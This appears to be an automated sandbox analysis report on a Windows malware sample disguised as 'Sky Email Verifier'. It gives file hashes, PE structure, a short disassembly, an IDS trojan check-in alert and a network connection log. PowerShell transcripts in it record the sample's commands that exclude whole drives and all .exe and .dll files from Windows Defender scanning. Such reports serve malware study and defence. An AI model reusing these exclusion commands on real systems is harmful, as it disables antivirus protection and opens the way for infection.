                                                                                                                                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527043746..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force..Process ID: 6348..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527043746..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Start time: 20220527044151.
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5443
                                                                                                                                                                                                                          Entropy (8bit):5.38492406816387
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:BZLhtNdqDo1ZMZthtNdqDo1Z3NgC4jZThtNdqDo1ZDBooiZB:8
                                                                                                                                                                                                                          MD5:0AB05038288EB62F928B5796E3AB532F
                                                                                                                                                                                                                          SHA1:A4A7A5967536C785C37C11362D29E12274F9D95A
                                                                                                                                                                                                                          SHA-256:CF1228D74864069EE2EE22E31725F4716D07F8EF048DC87260AA53696EC5CCBD
                                                                                                                                                                                                                          SHA-512:07C77B211F3B8C944A9AD1BD0B1ED0E26B952E1EB6CACD74BCEC5D7D2FAA75CE95133C38BA447AF36D7C0C2DC3A06635755CB25702F95F1F76ECC43C3E878129
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527043802..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force..Process ID: 6700..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527043802..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220527044104..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                                                                          Entropy (8bit):6.644060003425038
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                                                          MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                                                          SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                                                          SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.687518184227138
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                          File name:SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                                                          File size:1490944
                                                                                                                                                                                                                          MD5:c5bf732066ab84d1abba5b27638a5191
                                                                                                                                                                                                                          SHA1:07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
                                                                                                                                                                                                                          SHA256:a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
                                                                                                                                                                                                                          SHA512:2813858f134a0535777e51add46568f6211cc46f23c621bdd74f946665ae918c9b33bc5b54d2de26f087887aed87ead559c5c951eb6e0c3679253bc42724b86e
                                                                                                                                                                                                                          SSDEEP:24576:Nso5AJseqW68ZKg1gYLCh3JgzRQJHhrbMDEVuI2N1q:Nso5AJs+gYGh3JfEwVu4
                                                                                                                                                                                                                          TLSH:6F65BE88E9CEA255E81B9774E33DCC3851116D6EACF8184C6CCA7E2337773A6452B631
                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@.................................<......................................
                                                                                                                                                                                                                          Icon Hash:c4c4c4c8ccd4d0c4
                                                                                                                                                                                                                          Entrypoint:0x4014a5
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:2a2a662be9dffc461398e7c94d0b55b4
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          sub esp, 00000008h
                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                          mov eax, 00000004h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, 00000000h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D61h
                                                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                                                          mov eax, 00401483h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D83h
                                                                                                                                                                                                                          mov eax, 00000001h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D80h
                                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                                          mov eax, 00030000h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, 00010000h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D74h
                                                                                                                                                                                                                          add esp, 08h
                                                                                                                                                                                                                          mov eax, dword ptr [005383BCh]
                                                                                                                                                                                                                          mov ecx, dword ptr [005383C0h]
                                                                                                                                                                                                                          mov edx, dword ptr [005383C4h]
                                                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, dword ptr [00539000h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push edx
                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D4Eh
                                                                                                                                                                                                                          add esp, 14h
                                                                                                                                                                                                                          mov eax, dword ptr [005383BCh]
                                                                                                                                                                                                                          mov ecx, dword ptr [005383C0h]
                                                                                                                                                                                                                          mov edx, dword ptr [005383C4h]
                                                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                          mov eax, dword ptr [edx]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, dword ptr [ecx]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46B2Ch
                                                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          call 00007F0604E46D24h
                                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                                          leave
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          sub esp, 00000004h
                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                          mov eax, dword ptr [005383BCh]
                                                                                                                                                                                                                          mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                                                                                                                          mov eax, dword ptr [00000000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x138360 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13a000 | 0x34db8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13839c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x638 | 0x800 | False | 0.3896484375 | data | 4.36493258249 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x136541 | 0x136600 | False | 0.843532112112 | data | 7.87302614152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x139000 | 0x4 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x13a000 | 0x34db8 | 0x34e00 | False | 0.209279883274 | data | 4.42915798912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x13a430 | 0x668 | data | English | United States
RT_ICON | 0x13aa98 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512 | English | United States
RT_ICON | 0x13ad80 | 0x1e8 | data | English | United States
RT_ICON | 0x13af68 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x13b090 | 0x35e0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x13e670 | 0xea8 | data | English | United States
RT_ICON | 0x13f518 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x13fdc0 | 0x6c8 | data | English | United States
RT_ICON | 0x140488 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x1409f0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x151218 | 0x94a8 | data | English | United States
RT_ICON | 0x15a6c0 | 0x67e8 | data | English | United States
RT_ICON | 0x160ea8 | 0x5488 | data | English | United States
RT_ICON | 0x166330 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432 | English | United States
RT_ICON | 0x16a558 | 0x25a8 | data | English | United States
RT_ICON | 0x16cb00 | 0x10a8 | data | English | United States
RT_ICON | 0x16dba8 | 0x988 | data | English | United States
RT_ICON | 0x16e530 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_GROUP_ICON | 0x16e998 | 0x102 | data | English | United States
RT_VERSION | 0x16eaa0 | 0x314 | data | English | United States

DLL | Import
msvcrt.dll | strlen, malloc, fopen, fwrite, fclose, memset, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
kernel32.dll | CreateProcessA, CloseHandle, SetUnhandledExceptionFilter

Description | Data
LegalCopyright | www.skyextractor.com. All rights reserved.
FileVersion | 7,0,1,4
CompanyName | www.skyextractor.com
ProductName | Sky Email Verifier
ProductVersion | 7,0,1,4
FileDescription | Sky Email Verifier
FileTitle | Sky Email Verifier.exe
LegalTrademark |
Translation | 0x0409 0x04b0

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/22-04:38:15.388403 | TCP | 2832617 | ETPRO TROJAN W32.Bloat-A Checkin | 49739 | 80 | 192.168.2.3 | 69.42.215.252

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                          May 27, 2022 04:38:17.075644970 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.457859993 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.457882881 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.535357952 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.535397053 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.648462057 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.648528099 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.648690939 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.648737907 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.648823023 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.648838997 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.650280952 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.650338888 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.650454998 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.650480032 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824373960 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824556112 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824604988 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824656010 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824680090 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824722052 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824733019 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824754953 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824810982 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:17.824821949 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:18.818998098 CEST49741443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:18.819037914 CEST44349741172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:18.819384098 CEST49742443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:18.819423914 CEST44349742172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.866312027 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.866364956 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.866630077 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.868650913 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.868731976 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.868844032 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.888262033 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.888299942 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.889767885 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.889821053 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.939784050 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.939903021 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.940381050 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.940452099 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.940469027 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.940565109 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.945645094 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.945667982 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.948019981 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.948054075 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:19.953239918 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:19.953254938 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157166958 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157283068 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157305002 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157358885 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157382011 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157428980 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157440901 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157505035 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157516956 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.157581091 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.259882927 CEST49744443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.259941101 CEST44349744172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.261401892 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.261451006 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.261569023 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.262192011 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.262206078 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.309797049 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.309937000 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.332320929 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.332384109 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.332448959 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.332469940 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.332480907 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.333123922 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.333188057 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.333195925 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.374686003 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.374711990 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.377417088 CEST49743443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.377443075 CEST44349743172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.383826971 CEST49747443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.383874893 CEST44349747172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.383963108 CEST49747443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.384268045 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.384289026 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.458996058 CEST49747443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.459014893 CEST44349747172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.508893967 CEST44349747172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.508986950 CEST49747443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.509814978 CEST49747443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.509830952 CEST44349747172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.515219927 CEST49747443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:20.515234947 CEST44349747172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.585498095 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.585593939 CEST44349745172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.585602045 CEST49745443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.285113096 CEST49753443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.285120010 CEST44349753172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386149883 CEST44349752172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386260986 CEST44349752172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386347055 CEST49752443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386393070 CEST44349752172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386518955 CEST49752443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386532068 CEST49752443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386542082 CEST44349752172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386575937 CEST44349752172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386612892 CEST49752443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.386648893 CEST49752443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.422772884 CEST49752443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:21.422811985 CEST44349752172.217.168.14192.168.2.3
